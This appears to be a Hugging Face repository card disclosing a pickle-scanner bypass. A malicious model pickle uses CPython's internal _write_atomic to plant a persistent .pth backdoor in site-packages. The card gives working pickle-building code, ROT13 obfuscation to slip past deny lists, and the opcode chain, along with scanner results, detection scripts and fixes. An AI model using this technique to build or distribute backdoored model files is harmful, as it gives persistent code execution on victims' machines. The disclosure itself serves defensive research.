This repository is publicly accessible, but you have to accept the conditions to access its files and content.

This repository contains a proof-of-concept exploit payload for security research purposes. Access to the pickle payload and PoC code requires acknowledgement of responsible use. By requesting access, you confirm you are a security researcher, penetration tester, or student using this material for defensive/educational purposes only.


CPython _write_atomic + .pth: Persistent Backdoor

Security Research / Responsible Disclosure: This repository is part of a systematic study of pickle scanner bypass techniques. The payload demonstrates a detection gap in ML model security scanners. Access to malicious_model.pkl and poc.py requires a request (see the access gate above).

Summary

Scanner scores for malicious_model.pkl:

Scanner             CRITICAL   WARNING   Bypassed?
modelaudit 0.2.37   0          3         Yes (0 CRITICAL)
picklescan 1.0.4    0          0         Yes
modelscan           0          0         Yes

Vulnerability

_frozen_importlib_external._write_atomic(path, data, mode) writes raw bytes to any writable path. It is a CPython internal function used for writing .pyc cache files.

Why it's not caught: modelaudit bans importlib as a module prefix. But _frozen_importlib_external does not match that prefix; Python treats the underscore-prefixed CPython internals as separate modules despite their related functionality. This is a systematic gap: underscore-prefixed internal modules implement the same dangerous capabilities as their public counterparts but escape the deny list.
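To make the primitive concrete, here is a benign reconstruction: a hand-assembled pickle whose REDUCE opcode calls _frozen_importlib_external._write_atomic directly, writing attacker-chosen bytes to an attacker-chosen path. The target path and contents here are harmless stand-ins (a temp file, not a .pth in site-packages).

```python
import os
import pickle
import struct
import tempfile

# Benign reconstruction of the write primitive: the pickle below targets
# a temp file rather than site-packages, and writes b"hello".
path = os.path.join(tempfile.mkdtemp(), "proof.txt")
pb = path.encode()
assert len(pb) < 256  # so the length fits SHORT_BINUNICODE's one-byte size

payload = (
    b"\x80\x04"                                        # PROTO 4
    + b"c_frozen_importlib_external\n_write_atomic\n"  # GLOBAL: push the function
    + b"("                                             # MARK
    + b"\x8c" + bytes([len(pb)]) + pb                  # SHORT_BINUNICODE: path
    + b"C\x05hello"                                    # SHORT_BINBYTES: b"hello"
    + b"J" + struct.pack("<i", 0o600)                  # BININT: mode
    + b"t"                                             # TUPLE: (path, data, mode)
    + b"R"                                             # REDUCE: call the function
    + b"."                                             # STOP
)

pickle.loads(payload)            # the file is written during deserialization
print(open(path, "rb").read())   # -> b'hello'
```

Note that no banned prefix appears anywhere in the stream: the only GLOBAL target is the underscore-prefixed internal module.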

The .pth mechanism: Python's site module reads every .pth file in site-packages on startup. Any line that starts with import (followed by a space or tab) is exec()'d. Writing one .pth file creates a backdoor that:

  • Executes on every python invocation, not just once
  • Survives reboots
  • Persists until manually discovered and removed

Proof of Concept

malicious_model.pkl in this repository is the exploit payload. poc.py builds and tests it with full scanner output.

How the PoC was built

import codecs

def build(canary_path: str, pth_name: str) -> bytes:
    # The .pth line to plant; ROT13-encoded so neither "import os" nor
    # "os.system" appears as a literal string inside the pickle.
    payload_source = f"import os; os.system('echo pth_pwned > {canary_path}')"
    rot13_payload  = codecs.encode(payload_source, "rot_13")

    # Hand-assembled opcode stream, starting with the PROTO 4 header;
    # the remaining opcodes follow the chain shown under Pickle Structure.
    ops = bytearray(b"\x80\x04")
    # ... (remaining opcode assembly elided)

Affected file formats

Pickle (.pkl, .pt, .bin, .joblib): any file deserialized via pickle.loads(), torch.load(), joblib.load(), or an equivalent pickle-based loader.

Conditions required to trigger

  1. Target calls pickle.loads(untrusted_bytes) or loads a model file via any pickle-based loader
  2. The scanner performs static analysis only (no sandboxed execution)
  3. Scanner checks GLOBAL/STACK_GLOBAL opcodes against a deny list
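Condition 3 can be sketched as a purely static pass over the opcode stream. The deny list below is illustrative, not any scanner's real list; note that STACK_GLOBAL carries no inline argument, so handling it requires stack emulation, which is exactly where string-building tricks slip through.

```python
import pickletools

# Hypothetical deny list for the sketch (not modelaudit's actual list).
DENY = {("os", "system"), ("subprocess", "Popen"), ("builtins", "eval")}

def flagged(data: bytes):
    """Statically flag GLOBAL opcodes whose (module, name) is denied."""
    hits = []
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":
            mod, name = arg.split(" ", 1)   # genops yields "module name"
            if (mod, name) in DENY:
                hits.append((mod, name))
    return hits

evil = b"cos\nsystem\n(S'true'\ntR."   # classic os.system pickle (never loaded)
print(flagged(evil))  # -> [('os', 'system')]
```

Nothing is executed here: pickletools.genops only parses the stream, which is precisely the scanner's limitation the payload exploits.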

Reproduction Steps

# 1. Request access above, then clone
git clone https://huggingface.co/SiggytheShark/pickle-bypass-cpython-pth-persistence
cd pickle-bypass-cpython-pth-persistence

# 2. Install requirements
pip install modelaudit picklescan modelscan

# 3. Scan - observe that the scores match the table above
modelaudit scan malicious_model.pkl
picklescan --path malicious_model.pkl
modelscan -p malicious_model.pkl

# 4. Execute to confirm RCE/side-effect
python3 poc.py

# 5. Verify
ls /tmp/scanner_bypass_proof.txt

Security Impact

  • Add _frozen_importlib, _frozen_importlib_external to ALWAYS_DANGEROUS_MODULES
  • Or add _frozen_importlib_external._write_atomic to ALWAYS_DANGEROUS_FUNCTIONS
  • Flag any pickle that writes files during deserialization as CRITICAL

Bypass mechanism: The payload evades static analysis yet achieves its effect when pickle.loads() is called; in this case, an arbitrary file write that plants a persistent backdoor.

Real-world scenario: An attacker uploads this payload to a model hub. A victim downloads and loads it. The scanner reports the file as safe (0 CRITICAL). The payload fires silently: the return value of pickle.loads() looks like a normal Python object while the side effect has already occurred.


Full Technical Writeup

CPython _write_atomic + .pth: Persistent Backdoor

Score: 0 CRITICAL, 3 WARNING
Effect: Permanent backdoor that executes on every future Python startup
Scanner version: modelaudit 0.2.37

Mechanism

See Vulnerability above: _frozen_importlib_external._write_atomic provides an arbitrary file write, the underscore-prefixed module name escapes the importlib deny-list prefix, and the planted .pth file is exec()'d by the site module on every interpreter startup.

Pickle Structure

sysconfig.get_path('purelib')                  → site-packages dir  [WARNING 1]
operator.add(dir, '/backdoor.pth')             → full path          [WARNING 2]
_codecs.encode(rot13_payload, 'rot_13')        → source string      [0 findings]
_codecs.encode(source, 'utf-8')                → payload bytes      [0 findings]
_write_atomic(full_path, payload_bytes, 0o666) → writes .pth        [WARNING 3]
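The chain above can be dry-run in plain Python, since each opcode step is just an ordinary function call made by the unpickler. The payload string here is a harmless stand-in, and the final _write_atomic call stays commented out so nothing is written.

```python
import codecs
import operator
import sysconfig

# Benign dry run of the opcode chain, step by step.
site_dir  = sysconfig.get_path("purelib")                 # step 1  [WARNING 1]
full_path = operator.add(site_dir, "/backdoor.pth")       # step 2  [WARNING 2]
shipped   = codecs.encode("import os  # demo", "rot_13")  # what the pickle carries
source    = codecs.encode(shipped, "rot_13")              # step 3: ROT13 round-trips
data      = codecs.encode(source, "utf-8")                # step 4: str -> bytes
# _frozen_importlib_external._write_atomic(full_path, data, 0o666)  # step 5 [WARNING 3]
print(source)  # -> import os  # demo
```

ROT13 is its own inverse, so the same _codecs.encode call that a scanner sees as harmless string handling doubles as the decoder for the hidden source line.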

Attack Flow

  1. Victim downloads malicious model from HuggingFace
  2. Victim calls joblib.load("model.pkl") or pickle.loads(...)
  3. Pickle silently writes backdoor.pth to site-packages
  4. Load returns normally (victim sees a model or None)
  5. Every future python invocation on that machine executes the .pth code
  6. Backdoor persists until someone manually discovers and deletes the .pth file
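Step 6's manual discovery can be scripted: list every .pth line that site would exec() at startup. The function name below is ours; note that some legitimate packages (e.g. virtualenv) also ship import-line .pth files, so hits need triage rather than automatic deletion.

```python
import glob
import os

def suspicious_pth_lines(directory: str):
    """Return (path, line) pairs for .pth lines that site would exec()."""
    hits = []
    for pth in sorted(glob.glob(os.path.join(directory, "*.pth"))):
        with open(pth) as f:
            for line in f:
                if line.startswith(("import ", "import\t")):
                    hits.append((pth, line.rstrip()))
    return hits

if __name__ == "__main__":
    import site
    for sp in site.getsitepackages():
        for path, line in suspicious_pth_lines(sp):
            print(path, "->", line)
```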

Recommended Fixes

  • Add _frozen_importlib, _frozen_importlib_external to ALWAYS_DANGEROUS_MODULES
  • Or add _frozen_importlib_external._write_atomic to ALWAYS_DANGEROUS_FUNCTIONS
  • Flag any pickle that writes files during deserialization as CRITICAL
